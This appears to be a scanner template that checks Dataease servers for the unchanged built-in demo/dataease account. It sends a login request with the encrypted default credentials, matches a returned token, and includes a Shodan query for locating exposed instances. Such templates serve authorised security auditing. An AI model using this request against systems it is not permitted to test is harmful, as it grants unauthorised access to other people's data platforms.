id: dataease-default-login

info:
  name: Dataease - Default Login
  author: DhiyaneshDK
  severity: high
  description: |
    Dataease has a built-in account demo/dataease, and many developers forget to delete or change the account password.
    As a result, many Dataease can log in with this built-in account.
  reference:
    - https://github.com/dataease/dataease/issues/5995
  classification:
    cpe: cpe:2.3:a:dataease_project:dataease:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: dataease_project
    product: dataease
    shodan-query: html:"Dataease"
  tags: default-login,dataease

http:
  - method: POST
    path:
      - "{{BaseURL}}/api/auth/login"

    headers:
      Content-Type: application/json

    body: |
      {
        "username": "HmFJtDmMa9MZjlWEpCNAo7Yh/hRBI7mrCRfFTok7wES7qcpIJ04x0OQXW5fwtL4WtN29408wyAupmtMjvvXjag==",
        "password": "sL+oQsnErJMYGiLyzXj/Hy2opaZcSnfjGtYtm48q8tdkkINxzTtAOFI2NgDoorchFE790vWQYIgo1CMyjJ2jnw==",
        "loginType": 0
      }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - '"token":'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402205df35a9ed0ce1b7658b6b4447830d26b66e4207e130bceddb86565df11174cca02204ed63471b30f275a279c7a457b9f87a435c1822b254fb6d789be0c44860eaf83:922c64590222798bb761d5b6d8e72950